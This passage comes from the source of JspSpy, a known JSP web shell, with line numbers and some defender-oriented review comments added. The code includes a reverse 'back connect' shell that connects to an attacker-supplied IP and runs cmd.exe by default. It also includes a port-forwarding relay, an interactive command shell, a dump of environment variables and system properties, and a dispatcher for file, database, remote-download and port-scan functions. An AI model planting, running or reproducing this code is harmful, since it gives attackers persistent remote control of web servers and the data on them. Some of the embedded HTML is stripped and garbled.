"); 1861 | } catch (Exception e) { 1862 | e.printStackTrace(); 1863 | throw e ; 1864 | } 1865 | } 1866 | } 1867 | //StopMapPort 1868 | private static class SmpInvoker extends DefaultInvoker { 1869 | public boolean doAfter(){return true;} 1870 | public boolean doBefore(){return true;} 1871 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1872 | try { 1873 | Object obj = JSession.getAttribute(PORT_MAP); 1874 | if (obj != null) { 1875 | ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); 1876 | server.close(); 1877 | } 1878 | JSession.setAttribute("done","Stop Success!"); 1879 | ins.get("vmp").invoke(request,response,JSession); 1880 | } catch (Exception e) { 1881 | e.printStackTrace(); 1882 | throw e ; 1883 | } 1884 | } 1885 | } 1886 | private static class MapPortInvoker extends DefaultInvoker { 1887 | public boolean doBefore(){return false;} 1888 | public boolean doAfter(){return false;} 1889 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1890 | try { 1891 | PrintWriter out = response.getWriter(); 1892 | String localIP = request.getParameter("localIP"); 1893 | String localPort = request.getParameter("localPort"); 1894 | final String remoteIP = request.getParameter("remoteIP"); 1895 | final String remotePort = request.getParameter("remotePort"); 1896 | if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) 1897 | return; 1898 | Object obj = JSession.getAttribute(PORT_MAP); 1899 | if (obj != null) { 1900 | ServerSocket s = (ServerSocket)obj; 1901 | s.close(); 1902 | } 1903 | final ServerSocket server = new ServerSocket(); 1904 | server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); 1905 | JSession.setAttribute(PORT_MAP,server); 1906 | new Thread(new Runnable(){ 1907 | public void run(){ 1908 | while (true) { 1909 | Socket soc = null; 1910 | 
Socket remoteSoc = null; 1911 | DataInputStream remoteIn = null; 1912 | DataOutputStream remoteOut = null; 1913 | DataInputStream localIn = null; 1914 | DataOutputStream localOut = null; 1915 | try{ 1916 | soc = server.accept(); 1917 | remoteSoc = new Socket(); 1918 | remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); 1919 | remoteIn = new DataInputStream(remoteSoc.getInputStream()); 1920 | remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); 1921 | localIn = new DataInputStream(soc.getInputStream()); 1922 | localOut = new DataOutputStream(soc.getOutputStream()); 1923 | this.readFromLocal(localIn,remoteOut); 1924 | this.readFromRemote(soc,remoteSoc,remoteIn,localOut); 1925 | }catch(Exception ex) 1926 | { 1927 | break; 1928 | } 1929 | } 1930 | } 1931 | public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ 1932 | new Thread(new Runnable(){ 1933 | public void run(){ 1934 | while (true) { 1935 | try{ 1936 | byte[] data = new byte[100]; 1937 | int len = localIn.read(data); 1938 | while (len != -1) { 1939 | remoteOut.write(data,0,len); 1940 | len = localIn.read(data); 1941 | } 1942 | }catch (Exception e) { 1943 | break; 1944 | } 1945 | } 1946 | } 1947 | }).start(); 1948 | } 1949 | public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ 1950 | new Thread(new Runnable(){ 1951 | public void run(){ 1952 | while(true) { 1953 | try{ 1954 | byte[] data = new byte[100]; 1955 | int len = remoteIn.read(data); 1956 | while (len != -1) { 1957 | localOut.write(data,0,len); 1958 | len = remoteIn.read(data); 1959 | } 1960 | }catch (Exception e) { 1961 | try{ 1962 | soc.close(); 1963 | remoteSoc.close(); 1964 | }catch(Exception ex) { 1965 | } 1966 | break; 1967 | } 1968 | } 1969 | } 1970 | }).start(); 1971 | } 1972 | }).start(); 1973 | JSession.setAttribute("done","Map Port Success!"); 1974 | JSession.setAttribute("localIP",localIP); 
1975 | JSession.setAttribute("localPort",localPort); 1976 | JSession.setAttribute("remoteIP",remoteIP); 1977 | JSession.setAttribute("remotePort",remotePort); 1978 | response.sendRedirect(SHELL_NAME+"?o=vmp"); 1979 | } catch (Exception e) { 1980 | e.printStackTrace(); 1981 | throw e ; 1982 | } 1983 | } 1984 | } 1985 | //VBackConnect 1986 | private static class VbcInvoker extends DefaultInvoker { 1987 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1988 | try { 1989 | PrintWriter out = response.getWriter(); 1990 | Object ip = JSession.getAttribute("ip"); 1991 | Object port = JSession.getAttribute("port"); 1992 | Object program = JSession.getAttribute("program"); 1993 | Object done = JSession.getAttribute("done"); 1994 | JSession.removeAttribute("ip"); 1995 | JSession.removeAttribute("port"); 1996 | JSession.removeAttribute("program"); 1997 | JSession.removeAttribute("done"); 1998 | if (Util.isEmpty(ip)) 1999 | ip = request.getRemoteAddr(); 2000 | if (Util.isEmpty(port) || !Util.isInteger(port.toString())) 2001 | port = "4444"; 2002 | if (Util.isEmpty(program)) 2003 | program = "cmd.exe"; 2004 | if (!Util.isEmpty(done)) 2005 | Util.outMsg(out,done.toString()); 2006 | out.println("
"+ 2007 | ""+ 2008 | " "+ 2009 | " "+ 2010 | " "+ 2029 | ""+ 2030 | "

Back Connect >>

"+ 2011 | "
"+ 2012 | " "+ 2013 | " "+ 2014 | " "+ 2015 | " "+ 2020 | " "+ 2021 | " "+ 2022 | " "+ 2025 | " "+ 2026 | "
Your Ip :"+ 2016 | " "+ 2017 | " Your Port :"+ 2018 | " Program To Back :"+ 2019 | "

"+ 2023 | " "+ 2024 | "
"+ 2027 | "
"+ 2028 | "
"+ 2031 | "
");
2032 | } catch (Exception e) {
2033 | e.printStackTrace();
2034 | throw e ;
2035 | }
2036 | }
2037 | }
// BackConnectInvoker: opens an outbound TCP connection from the server to the
// client-supplied "ip" and "port", starts the process named by "program", and hands
// the process and socket streams to two StreamConnector instances. StreamConnector
// is defined elsewhere in the file; presumably it copies bytes from its first
// stream to its second. Confirm against its definition.
// NOTE(review): defender view: the footprint is an outbound connection initiated
// by the servlet container to an arbitrary host, paired with a newly spawned child
// process. Default-deny egress from application servers blocks the connection.
2038 | private static class BackConnectInvoker extends DefaultInvoker {
2039 | public boolean doAfter(){return false;}
2040 | public boolean doBefore(){return false;}
2041 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2042 | try {
2043 | String ip = request.getParameter("ip");
2044 | String port = request.getParameter("port");
2045 | String program = request.getParameter("program");
// The only validation: ip and program must be non-empty and port must pass
// Util.isInteger.
2046 | if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port))
2047 | return;
// Neither the socket nor the process is closed or tracked by this method.
2048 | Socket socket = new Socket(ip,Integer.parseInt(port));
2049 | Process process = Runtime.getRuntime().exec(program);
2050 | (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
2051 | (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
// The submitted values are kept in the session so the "vbc" form can show them
// again after the redirect.
2052 | JSession.setAttribute("done","Back Connect Success!");
2053 | JSession.setAttribute("ip",ip);
2054 | JSession.setAttribute("port",port);
2055 | JSession.setAttribute("program",program);
2056 | response.sendRedirect(SHELL_NAME+"?o=vbc");
2057 | } catch (Exception e) {
2058 | e.printStackTrace();
2059 | throw e ;
2060 | }
2061 | }
2062 | }
2063 | private static class JspEnvInvoker extends DefaultInvoker {
2064 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2065 | try {
2066 | PrintWriter out = response.getWriter();
2067 | out.println(""+
2068 | " "+
2069 | " "+
2086 | " "+
2087 | "

System Properties >>

"+ 2070 | "
"+ 2071 | "
"+ 2072 | "
    "); 2073 | Properties pro = System.getProperties(); 2074 | Enumeration names = pro.propertyNames(); 2075 | while (names.hasMoreElements()){ 2076 | String name = (String)names.nextElement(); 2077 | out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
  • "); 2078 | } 2079 | out.println("

System Environment >>


    "); 2080 | Map envs = System.getenv(); 2081 | Set> entrySet = envs.entrySet(); 2082 | for (Map.Entry en:entrySet) { 2083 | out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
  • "); 2084 | } 2085 | out.println("
"); 2088 | } catch (Exception e) { 2089 | e.printStackTrace(); 2090 | throw e ; 2091 | } 2092 | } 2093 | } 2094 | private static class TopInvoker extends DefaultInvoker { 2095 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 2096 | try { 2097 | PrintWriter out = response.getWriter(); 2098 | out.println("
"+ 2099 | ""+ 2100 | " "+ 2101 | " "+ 2102 | " "+ 2103 | " "+ 2104 | " "+ 2117 | "
JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
Logout | "+ 2105 | " File Manager | "+ 2106 | " DataBase Manager | "+ 2107 | " Execute Command | "+ 2108 | " Shell OnLine | "+ 2109 | " Back Connect | "+ 2110 | " Port Scan | "+ 2111 | " Download Remote File | "+ 2112 | " ClipBoard | "+ 2113 | " Remote Control | "+ 2114 | " Port Map | "+ 2115 | " JSP Env "+ 2116 | "
"); 2118 | if (JSession.getAttribute(MSG) != null) { 2119 | Util.outMsg(out,JSession.getAttribute(MSG).toString()); 2120 | JSession.removeAttribute(MSG); 2121 | } 2122 | } catch (Exception e) { 2123 | e.printStackTrace(); 2124 | throw e ; 2125 | } 2126 | } 2127 | } 2128 | private static class VOnLineShellInvoker extends DefaultInvoker { 2129 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 2130 | try { 2131 | PrintWriter out = response.getWriter(); 2132 | out.println(""); 2158 | out.println(""+ 2159 | " "+ 2160 | " "+ 2200 | " "+ 2201 | "
"); 2161 | out.println("

Shell OnLine »


"); 2162 | out.println("
"+ 2163 | " "+ 2164 | " "+ 2165 | " Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ 2166 | "
"+ 2167 | "
"+ 2168 | " "+ 2170 | "
"+ 2171 | " "+ 2172 | " "+ 2173 | " "+ 2194 | " Auto Scroll"+ 2195 | " "+ 2196 | "
"+ 2197 | " " 2198 | ); 2199 | out.println("
"); 2202 | } catch (Exception e) { 2203 | e.printStackTrace(); 2204 | throw e ; 2205 | } 2206 | } 2207 | } 2208 | private static class OnLineInvoker extends DefaultInvoker { 2209 | public boolean doBefore(){return false;} 2210 | public boolean doAfter(){return false;} 2211 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 2212 | try { 2213 | String type = request.getParameter("type"); 2214 | if (Util.isEmpty(type)) 2215 | return; 2216 | if (type.toLowerCase().equals("start")) { 2217 | String exe = request.getParameter("exe"); 2218 | if (Util.isEmpty(exe)) 2219 | return; 2220 | Process pro = Runtime.getRuntime().exec(exe); 2221 | ByteArrayOutputStream outs = new ByteArrayOutputStream(); 2222 | response.setContentLength(100000000); 2223 | response.setContentType("text/html;charset="+Charset.defaultCharset().name()); 2224 | OnLineProcess olp = new OnLineProcess(pro); 2225 | JSession.setAttribute(SHELL_ONLINE,olp); 2226 | new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); 2227 | new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); 2228 | new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 2229 | Thread.sleep(1000 * 60 * 60 * 24); 2230 | } else if (type.equals("ecmd")) { 2231 | Object o = JSession.getAttribute(SHELL_ONLINE); 2232 | String cmd = request.getParameter("cmd"); 2233 | if (Util.isEmpty(cmd)) 2234 | return; 2235 | if (o == null) 2236 | return; 2237 | OnLineProcess olp = (OnLineProcess)o; 2238 | olp.setCmd(cmd); 2239 | } else { 2240 | Object o = JSession.getAttribute(SHELL_ONLINE); 2241 | if (o == null) 2242 | return; 2243 | OnLineProcess olp = (OnLineProcess)o; 2244 | olp.stop(); 2245 | } 2246 | } catch (Exception e) { 2247 | e.printStackTrace(); 2248 | throw e ; 2249 | } 2250 | } 2251 | } 2252 | 2253 | static{ 2254 | ins.put("script",new 
ScriptInvoker()); 2255 | ins.put("before",new BeforeInvoker()); 2256 | ins.put("after",new AfterInvoker()); 2257 | ins.put("deleteBatch",new DeleteBatchInvoker()); 2258 | ins.put("clipboard",new ClipBoardInvoker()); 2259 | ins.put("vRemoteControl",new VRemoteControlInvoker()); 2260 | ins.put("gc",new GcInvoker()); 2261 | ins.put("vPortScan",new VPortScanInvoker()); 2262 | ins.put("portScan",new PortScanInvoker()); 2263 | ins.put("vConn",new VConnInvoker()); 2264 | ins.put("dbc",new DbcInvoker()); 2265 | ins.put("executesql",new ExecuteSQLInvoker()); 2266 | ins.put("vLogin",new VLoginInvoker()); 2267 | ins.put("login",new LoginInvoker()); 2268 | ins.put("filelist", new FileListInvoker()); 2269 | ins.put("logout",new LogoutInvoker()); 2270 | ins.put("upload",new UploadInvoker()); 2271 | ins.put("copy",new CopyInvoker()); 2272 | ins.put("bottom",new BottomInvoker()); 2273 | ins.put("vCreateFile",new VCreateFileInvoker()); 2274 | ins.put("vEdit",new VEditInvoker()); 2275 | ins.put("createFile",new CreateFileInvoker()); 2276 | ins.put("vEditProperty",new VEditPropertyInvoker()); 2277 | ins.put("editProperty",new EditPropertyInvoker()); 2278 | ins.put("vs",new VsInvoker()); 2279 | ins.put("shell",new ShellInvoker()); 2280 | ins.put("down",new DownInvoker()); 2281 | ins.put("vd",new VdInvoker()); 2282 | ins.put("downRemote",new DownRemoteInvoker()); 2283 | ins.put("index",new IndexInvoker()); 2284 | ins.put("mkdir",new MkDirInvoker()); 2285 | ins.put("move",new MoveInvoker()); 2286 | ins.put("removedir",new RemoteDirInvoker()); 2287 | ins.put("packBatch",new PackBatchInvoker()); 2288 | ins.put("pack",new PackInvoker()); 2289 | ins.put("unpack",new UnPackInvoker()); 2290 | ins.put("vmp",new VmpInvoker()); 2291 | ins.put("vbc",new VbcInvoker()); 2292 | ins.put("backConnect",new BackConnectInvoker()); 2293 | ins.put("jspEnv",new JspEnvInvoker()); 2294 | ins.put("smp",new SmpInvoker()); 2295 | ins.put("mapPort",new MapPortInvoker()); 2296 | ins.put("top",new TopInvoker()); 
// Tail of the static initializer: each handler is registered in the ins map under
// the name that the "o" request parameter selects in the scriptlet below.
2297 | ins.put("vso",new VOnLineShellInvoker());
2298 | ins.put("online",new OnLineInvoker());
2299 | }
2300 | %>
2301 | <%
// Request dispatcher for the whole page. The "o" parameter is looked up in ins;
// an empty or unknown value redirects to ?o=index.
// NOTE(review): no login or session check appears in this scriptlet itself;
// whether one is enforced inside the handlers is not visible in this part of the
// file.
// NOTE(review): for log triage, the value of "o" names the capability that was
// used, for example "shell", "down", "downRemote", "backConnect" or "mapPort" as
// registered in the static initializer.
2302 | try {
2303 | String o = request.getParameter("o");
2304 | if (!Util.isEmpty(o)) {
2305 | Invoker in = ins.get(o);
2306 | if (in == null) {
2307 | response.sendRedirect(SHELL_NAME+"?o=index");
2308 | } else {
// Handlers that return true from doBefore() get the page header: an optional
// "folder" parameter replaces the session's current directory, then the
// "before", "script" and "top" handlers run.
2309 | if (in.doBefore()) {
2310 | String path = request.getParameter("folder");
2311 | if (!Util.isEmpty(path))
2312 | session.setAttribute(CURRENT_DIR,path);
2313 | ins.get("before").invoke(request,response,session);
2314 | ins.get("script").invoke(request,response,session);
2315 | ins.get("top").invoke(request,response,session);
2316 | }
2317 | in.invoke(request,response,session);
// Handlers that return false from doAfter() end the response here; the others
// get the "bottom" and "after" handlers appended.
2318 | if (!in.doAfter()) {
2319 | return;
2320 | }else{
2321 | ins.get("bottom").invoke(request,response,session);
2322 | ins.get("after").invoke(request,response,session);
2323 | }
2324 | }
2325 | } else {
2326 | response.sendRedirect(SHELL_NAME+"?o=index");
2327 | }
2328 | } catch (Exception e) {
// Error path: the stack trace is captured, the current directory is reset to
// SHELL_DIR, and the HTML-encoded trace is written into the page before the
// footer handlers run.
2329 | ByteArrayOutputStream bout = new ByteArrayOutputStream();
2330 | e.printStackTrace(new PrintStream(bout));
2331 | session.setAttribute(CURRENT_DIR,SHELL_DIR);
2332 | Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
"),"left");
2333 | bout.close();
2334 | out.flush();
2335 | ins.get("bottom").invoke(request,response,session);
2336 | ins.get("after").invoke(request,response,session);
2337 | }
2338 | %>
2339 | --------------------------------------------------------------------------------